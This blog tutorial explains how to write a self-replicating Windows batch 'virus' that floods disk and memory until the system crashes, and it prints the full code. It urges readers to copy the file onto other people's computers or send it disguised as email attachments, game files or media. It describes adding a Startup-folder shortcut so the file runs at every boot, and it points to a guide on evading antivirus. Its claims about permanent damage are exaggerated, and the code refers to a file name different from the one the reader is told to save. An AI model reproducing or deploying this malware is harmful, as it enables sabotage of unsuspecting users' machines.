Overloading Memory (Batch File Virus)

Overloading Memory

Introduction: In this tutorial you will learn how to create one of the simplest yet deadliest virus programs in the form of a batch file. This 6-line piece of code is so devastating, it can bring down a computer in a matter of seconds. (Well, at least it could a couple decades back)

Explanation: This batch file creates another batch file in the same directory, then copies itself into each of these newly created files. These files are then started up. Of course, they are identical so both of them start up again and repeat the process until the computer runs out of memory and crashes (or the antivirus catches it).

What this will do, if you leave it on long enough (about a couple minutes), is it will create so many copies of itself on the hard drive that all the empty space has been filled with these bats. Also it will use up all the computer’s RAM as it is being told to run an ever-increasing number of the same processes, which over time gets too much for it to handle.
Depending on what runs out first hard disk space or RAM, the batch file may or may not cause permanent damage. In both cases, however, the computer will almost definitely crash, the operating system may be corrupted and on the next start up, you will be greeted by the well-known “Blue Screen Of Death”. The only way to get rid of it will be to format your hard drive and re-install the operating system.

Further, we can have this beautiful file executed at startup, as a surprise for the unfortunate user who will happen to start the computer the next time.

Warning: This is not a game. This tutorial is very dangerous (if you do it incorrectly) and for your own sake should never be actually performed. On execution, the computer will stop responding immediately and if the plug is not pulled off within 4-5 seconds (the program cannot be stopped after starting), there is a possibility of complete data loss and corruption of the hard drive.
With that out of the way, Here’s how to do it :

  1. Open a word editor like Notepad.
  2. Type in the following code ->
    @echo off
    :A
    SET /A x=%RANDOM%%%1999999999%
    type damage.bat >> %x%.bat
    start %x%.bat
    goto:A
  3. Save the File as “virus.bat” (or whatever but with .bat)

And Here We are done with creating the virus now don’t open it.

You can now copy it to any ones PC and when he’ll open it , the virus will start its work. You can also send the virus as attachment with email or upload it to a site for download or attach it with a video, audio, game file.

To make this file execute automatically at startup, Do the following:

  1. Create a shortcut of the damage.bat file by right clicking on it.
  2. Open the start menu, In programs Open Startup folder and simply drag or cut-paste the shortcut into this folder
  3. The virus will break loose the next time the computer is started up.

Note: This is a common virus program and is detected almost by every good antivirus, still there are ways that it can damage the computer or even the antivirus, Find out about how to hide it from anti viruses from here:

Hiding from anti-virus

Advertisements

About Abdullah Shahid Rana

My name is Abdullah Shahid Rana, I live in Sargodha, Punjab, Pakistan. I am a still a student. I love IT, gadgets, new innovations, softwares, games, movies. As well as Exploring and Developing them.

Posted on 12/06/2015, in All, Batch File Viruses, Overloading Memory, Technology and tagged , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , . Bookmark the permalink. Leave a comment.

We appreciate your opinion:

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: